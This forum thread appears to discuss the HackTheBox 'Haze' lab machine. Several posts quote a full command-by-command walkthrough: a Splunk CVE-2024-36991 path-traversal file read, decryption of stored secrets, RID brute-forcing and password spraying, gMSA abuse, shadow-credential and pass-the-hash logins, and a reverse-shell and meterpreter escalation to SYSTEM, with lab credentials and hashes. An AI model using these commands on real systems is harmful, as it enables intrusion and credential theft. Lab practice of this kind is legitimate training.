Posts: 4
Threads: 0
Joined: Apr 2025
(Apr 01, 2025, 12:55 PM)0zxc Wrote: (Apr 01, 2025, 12:49 PM)nlea561 Wrote: (Mar 29, 2025, 08:23 PM)potato_moose Wrote: evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
how did you find mark's username ? with taylor i am only able to find 3 other users but not mark
crackmapexec smb 10.10.11.61 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --rid-brute
thanks man !! i was spamming --users 
Posts: 15
Threads: 1
Joined: Jan 2025
then u make password spray with that users and u got mark.adams )))
Posts: 5
Threads: 0
Joined: Mar 2025
(Apr 01, 2025, 12:55 PM)0zxc Wrote: (Apr 01, 2025, 12:49 PM)nlea561 Wrote: (Mar 29, 2025, 08:23 PM)potato_moose Wrote: evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
how did you find mark's username ? with taylor i am only able to find 3 other users but not mark
crackmapexec smb 10.10.11.61 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --rid-brute
TGT:
python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H ':735C02C6B2DC54C3C8C6891F55279EBC' --target edward.martin --action "add"
python3 gettgtpkinit.py -cert-pfx KauKks8z.pfx -pfx-pass qsbBTgXXJr2eDHxmSpEW haze.htb/edward.martin edward.martin.ccache
Yea and after getting the.ccache file i and facing errors from secretsdump.py while trying to get the hash.
Errors: [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
Posts: 1
Threads: 0
Joined: Apr 2024
Full Haze machine write-up. Enjoy!
user flag
Initial enum
nmap <host>
nuclei --target http://<host>:8000 --tags splunk
Splunk CVE-2024-36991 exploit
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Poop rid & Spray piss
crackmapexec smb <host> -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
crackmapexec smb <host> -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
ldapdomaindump -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -o ldapdump <host>
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i <host>
whoami /all
gMSA_Managers group exploit
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exit
netexec ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
Pour the blood & drink it
bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -c all -dc dc01.haze.htb -ns <host> --dns-tcp --zip
Support_Services group exploit
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
pywhisker --dc-ip <host> -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action 'add' --filename edward
python3 gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass <pass> edward.ccache
export KRB5CCNAME=edward.ccache
python3 getnthash.py haze.htb/edward.martin -key <key>
evil-winrm -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af' -i <host>
gc C:\Users\edward.martin\Desktop\user.txt
download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit
unzip, grep passwords & decrypt
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
splunk creds admin:Sp1unkadmin@2k24
https://github.com/0xjpuff/reverse_shell_splunk
spawn meterpreter shell and exploit SeImpersonatePrivilege
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
# Welcome!
Bonus
evil-winrm -u 'Administrator' -H '06dc954d32cb91ac2831d67e3e12027f' -i <host>
Posts: 11
Threads: 0
Joined: Oct 2024
evil-winrm in as edward.martin, was able to download. Never actually tried using the LFI to download (although in hindsight should have, but even if it worked, how would one know to download without knowing to download kinda thing)
Posts: 13
Threads: 0
Joined: Apr 2025
thanks for help me dog machine hackthebox please
Posts: 6
Threads: 0
Joined: Sep 2024
(Apr 01, 2025, 01:32 PM)john255 Wrote: Full Haze machine write-up. Enjoy!
user flag
Initial enum
nmap <host>
nuclei --target http://<host>:8000 --tags splunk
Splunk CVE-2024-36991 exploit
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Poop rid & Spray piss
crackmapexec smb <host> -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
crackmapexec smb <host> -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
ldapdomaindump -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -o ldapdump <host>
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i <host>
whoami /all
gMSA_Managers group exploit
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exit
netexec ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
Pour the blood & drink it
bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -c all -dc dc01.haze.htb -ns <host> --dns-tcp --zip
Support_Services group exploit
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
pywhisker --dc-ip <host> -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action 'add' --filename edward
python3 gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass <pass> edward.ccache
export KRB5CCNAME=edward.ccache
python3 getnthash.py haze.htb/edward.martin -key <key>
evil-winrm -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af' -i <host>
gc C:\Users\edward.martin\Desktop\user.txt
root flag
download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit
unzip, grep passwords & decrypt
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
splunk creds admin:Sp1unkadmin@2k24
https://github.com/0xjpuff/reverse_shell_splunk
spawn meterpreter shell and exploit SeImpersonatePrivilege
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
# Welcome!
Bonus
evil-winrm -u 'Administrator' -H '06dc954d32cb91ac2831d67e3e12027f' -i <host>
I'm having some trouble in the bloodyAD part:
❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: argument {add,get,remove,set}: invalid choice: 'rc4' (choose from add, get, remove, set)
So removing -f rc4:
❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: unrecognized arguments: Haze-IT-Backup$
Posts: 4
Threads: 0
Joined: Apr 2025
(Mar 29, 2025, 10:39 PM)whaleflight Wrote: (Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote: (Mar 29, 2025, 10:12 PM)pop10189 Wrote: (Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote: (Mar 29, 2025, 09:55 PM)pop10189 Wrote: you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group
I was not able to do that. Can you tell how?
look for GMSA section https://notes.qazeer.io/active-directory...exploiting
Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa
Account: Haze-IT-Backup$ NTLM:
I literally got this as the hash no NTLM
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName
then gMSADumper should work
In cases where you don't have winrm access you can use this technique:
https://github.com/NicelyCla/exploit_GMSA_MANAGER
Posts: 1
Threads: 0
Joined: Apr 2025
(Apr 04, 2025, 06:14 AM)DeathReaper Wrote: (Apr 01, 2025, 01:32 PM)john255 Wrote: Full Haze machine write-up. Enjoy!
user flag
Initial enum
nmap <host>
nuclei --target http://<host>:8000 --tags splunk
Splunk CVE-2024-36991 exploit
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Poop rid & Spray piss
crackmapexec smb <host> -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
crackmapexec smb <host> -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
ldapdomaindump -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -o ldapdump <host>
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i <host>
whoami /all
gMSA_Managers group exploit
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exit
netexec ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
Pour the blood & drink it
bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -c all -dc dc01.haze.htb -ns <host> --dns-tcp --zip
Support_Services group exploit
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
pywhisker --dc-ip <host> -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action 'add' --filename edward
python3 gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass <pass> edward.ccache
export KRB5CCNAME=edward.ccache
python3 getnthash.py haze.htb/edward.martin -key <key>
evil-winrm -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af' -i <host>
gc C:\Users\edward.martin\Desktop\user.txt
root flag
download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit
unzip, grep passwords & decrypt
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
splunk creds admin:Sp1unkadmin@2k24
https://github.com/0xjpuff/reverse_shell_splunk
spawn meterpreter shell and exploit SeImpersonatePrivilege
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
# Welcome!
Bonus
evil-winrm -u 'Administrator' -H '06dc954d32cb91ac2831d67e3e12027f' -i <host>
I'm having some trouble in the bloodyAD part:
❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: argument {add,get,remove,set}: invalid choice: 'rc4' (choose from add, get, remove, set)
So removing -f rc4:
❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: unrecognized arguments: Haze-IT-Backup$
I have encountered the same issue. Had you passed over it?
Posts: 2
Threads: 0
Joined: Apr 2025
(Mar 31, 2025, 12:41 PM)littletonoone2 Wrote: Can someone post an explaination for getting edward martin? I dont get it why are you using pywhisker and what made yall think you should use it?
yeah i'm in the same boat.
i understand that after running sharp/bloodhound a second time using haze-it-backup's we can see the path to edward.martin. sure enough we change the owner and give full control given that we have a path/permissions to do so. but from here i only see the force password change, which isn't very relevant given that we don't have user interaction.
so what enumeration was run, which points to using pywhisker from there?
|
